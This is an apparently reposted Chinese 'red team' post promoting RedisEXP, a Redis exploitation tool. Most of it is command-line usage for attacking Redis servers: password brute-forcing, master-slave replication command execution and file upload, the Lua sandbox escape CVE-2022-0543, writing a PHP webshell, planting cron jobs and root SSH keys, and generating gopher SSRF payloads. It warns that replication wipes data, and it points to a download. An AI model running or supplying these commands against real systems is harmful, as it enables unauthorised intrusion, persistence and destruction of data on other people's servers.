RediesEXP 是一款Redis 漏洞利用工具,其功能包括,Redis 爆破、主从复制、redis 写webshell、反弹shell、Lua沙盒绕过命令执行、ssh公钥、ssrf+redis利用等
主从复制会清空数据,主从复制会清空数据,主从复制会清空数据,请注意使用!请注意使用!请注意使用!
██████╗ ███████╗██████╗ ██╗███████╗ ███████╗██╗ ██╗██████╗██╔══██╗██╔════╝██╔══██╗██║██╔════╝ ██╔════╝╚██╗██╔╝██╔══██╗██████╔╝█████╗ ██║ ██║██║███████╗ █████╗ ╚███╔╝ ██████╔╝██╔══██╗██╔══╝ ██║ ██║██║╚════██║ ██╔══╝ ██╔██╗ ██╔═══╝██║ ██║███████╗██████╔╝██║███████║ ███████╗██╔╝ ██╗██║╚═╝ ╚═╝╚══════╝╚═════╝ ╚═╝╚══════╝ ╚══════╝╚═╝ ╚═╝╚═╝基本连接:RedisExp.exe -r 192.168.19.1 -p 6379 -w 123456爆破 Redis 密码:RedisExp.exe brute -r 192.168.19.1 -f pass.txt主从复制执行命令 (默认是交互式 shell)(Redis版本 4.x - 5.x):RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -c whoami (单次执行)RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1RedisExp.exe rce -r 192.168.19.1 -L 127.0.0.1 -f exp.so (Linux)主从复制文件上传 (windows 中文需要设置gbk)(Redis版本 4.x - 5.x):RedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -d c:\中文\ -f shell.php -F shell.txt -gRedisExp.exe upload -r 192.168.19.1 -L 127.0.0.1 -f shell.php -F shell.txtLua沙盒绕过命令执行 CVE-2022-0543:RedisExp.exe lua -r 192.168.19.6 -c whoami备份写 Webshell (Windows 中文路径要设置gbk, linux 中文路径不用设置):RedisExp.exe shell -r 192.168.19.1 -d c:\中文\ -f shell.php -s "<?php phpinfo();?>" -gLinux 写计划任务:RedisExp.exe cron -r 192.168.19.1 -L 127.0.0.1 -P 2222Linux 写 SSH 公钥:RedisExp.exe ssh -r 192.168.19.1 -u root -s "ssh-rsa AAAAB"执行 Redis 命令:RedisExp.exe cli -r 192.168.19.1生成 gopher ssrf redis payload:RedisExp.exe gopher -f 1.txt
下载链接
原文始发于微信公众号(贝雷帽SEC):【红队】Redis 漏洞利用工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论